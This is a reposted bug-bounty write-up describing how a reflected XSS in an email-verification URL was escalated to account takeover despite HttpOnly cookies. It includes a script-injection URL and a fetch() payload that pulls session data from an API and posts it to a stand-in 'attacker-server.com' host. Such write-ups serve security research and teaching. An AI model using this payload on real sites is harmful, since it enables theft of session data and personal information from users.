.png)
5 hours ago
5 BOOK THIS SPACE FOR AD
ARTICLE AD
Today, I explored a powerful technique for escalating a reflected XSS (RXSS) vulnerability into full account takeover (ATO), even when the HttpOnly flag is set on session cookies. This method, detailed in a write-up by Mohamed Tarek, highlights how a simple XSS bug can be weaponized to steal user session data.
During testing, the researcher found a base64-encoded email parameter in a verification URL: https://xyz-target.com/authn/email/needverification?e=dGltb29vbkBidWdjcm93ZG5pbmphLmNvbQ==
When decoded, the e parameter contained the user’s email, which was reflected on the page. This led to a successful reflected XSS by injecting a malicious script in the parameter: https://xyz.target.com/authn/email/needverification?e=<script>alert(document.cookie)</script>
This executed JavaScript on the victim’s browser, but there was a problem:
🔹 The session cookie had the HttpOnly flag set, preventing JavaScript from accessing it directly.
Since JavaScript couldn’t read cookies due to the HttpOnly flag, the researcher searched for alternative ways to steal the victim’s session.
🔹 Solution: Look for API endpoints that return session-related data.
Using Burp Suite, an interesting request was found:
https://api.target.com/home/v1/UserPersonalization/mymodules?more=true
This endpoint returned personal identifiable information (PII) and the user’s session ID in the response.
To exploit this, a fetch() request was used to send an authenticated request to the API endpoint from the victim’s browser. Since the victim was logged in, their session cookie was automatically included in the request:
fetch(‘https://api.target.com/home/v1/UserPersonalization/mymodules?more=true', {
method: ‘GET’,
credentials: ‘include’, // Sends the victim’s session cookie
headers: { ‘Content-Type’: ‘application/json’ }
}).then(response => response.text())
.then(data => {
var xhr = new XMLHttpRequest();
xhr.open(‘POST’, ‘https://attacker-server.com/data'); // Sends stolen data to the attacker’s server
xhr.send(data);
});
To ensure execution, the final payload was injected into an <img> tag inside the XSS exploit:
Once the victim visited the malicious link, their PII and session data were exfiltrated to the attacker’s server, leading to full account takeover.
✔ 26.8% of ATOs are escalated from XSS — always attempt escalation!
✔ Even if HttpOnly cookies block JavaScript access, you can steal session data using API requests.
✔ Analyze API traffic for exposed session information, API keys, or CSRF tokens.
✔ Never stop at finding XSS — always check for chaining opportunities.
![OTP Bypass on [Redacted]: Contact Forms to Unauthorized Calls](https://miro.medium.com/v2/resize:fit:547/1*8IL2jXIbRemLJln3M9GsQw.png)
Bengali (Bangladesh) · 
English (United States) ·